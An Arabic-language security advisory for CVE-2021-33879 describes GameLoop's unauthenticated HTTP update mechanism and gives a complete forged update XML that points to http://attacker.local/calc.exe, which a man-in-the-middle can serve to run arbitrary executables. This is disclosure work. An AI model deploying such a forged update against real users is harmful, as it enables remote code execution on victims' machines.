
تحديث GameLoop MITM
معرف CVE: CVE-2021-33879
اسم المنتج (المنتجات) المتأثر وإصداراته: GameLoop (جميع الإصدارات السابقة للإصدار 4.1.21.90)
نوع الثغرة: CWE-494: تنزيل كود بدون التحقق من التكامل
ملخص
GameLoop هو محاكي أندرويد مطور من Tencent. يتميز بآلية تحديث غير مشفرة أو موثقة (بخلاف تجزئات MD5 التي يمكن للمهاجم التحكم فيها في هذا الاستغلال)، مما يسمح للمهاجم في وضع الوسيط (MITM) باعتراض وإرسال حزم التحديث الخاصة به ليتم تنفيذها على جهاز الضحية.
الوصف
قامت Tencent GameLoop قبل الإصدار 4.1.21.90 بتنزيل التحديثات عبر اتصال HTTP غير آمن. يمكن لمهاجم خبيث في وضع الوسيط تزييف محتويات مستند XML يصف حزمة تحديث، واستبدال رابط التنزيل بآخر يشير إلى أي ملف تنفيذي ويندوز عشوائي. نظرًا لأن فحص التكامل الوحيد سيكون مقارنة التجزئة MD5 للملف الذي تم تنزيله مع التجزئة الموجودة في مستند XML، فسيتم تنفيذ الملف التنفيذي الذي تم تنزيله على جهاز الضحية.
إعادة الإنتاج
ComponentUpdate.xmlComponentUpdate.xml (وضع الرابط المناسب، md5 وحجم ملف الحمولة)<?xml version="1.0" encoding="utf-8"?>
<UpdateConfig>
<GlobalConfig>
<Item name="UpdateEnable" Value="1" />
</GlobalConfig>
<UpdatePolicy>
<PolicyItem id="1" Enable="1" AutoUpdateRate="1" ManualUpdateRate="100" MatchUpdateOperation="2" Weight="4">
<Condition Method="Or">
<MatchSupplyId Type="market" MatchResult="0" Start="3.10.199.100" End="4.99.999.999" />
</Condition>
</PolicyItem>
</UpdatePolicy>
<UpdateOperation>
<OperItem id="2" inherit="0" Desc="This is a malicious update" Title="Malicious update" text="I could serve you ransomware but I'll just spawn calc">
<Item Type="market" url="http://attacker.local/calc.exe" md5="c4cb4fdf6369dd1342d2666171866ce5" version="5.10.199.100" filesize="32768" />
</OperItem>
</UpdateOperation>
</UpdateConfig>


العلاج
تثبيت إصدار أحدث من GameLoop.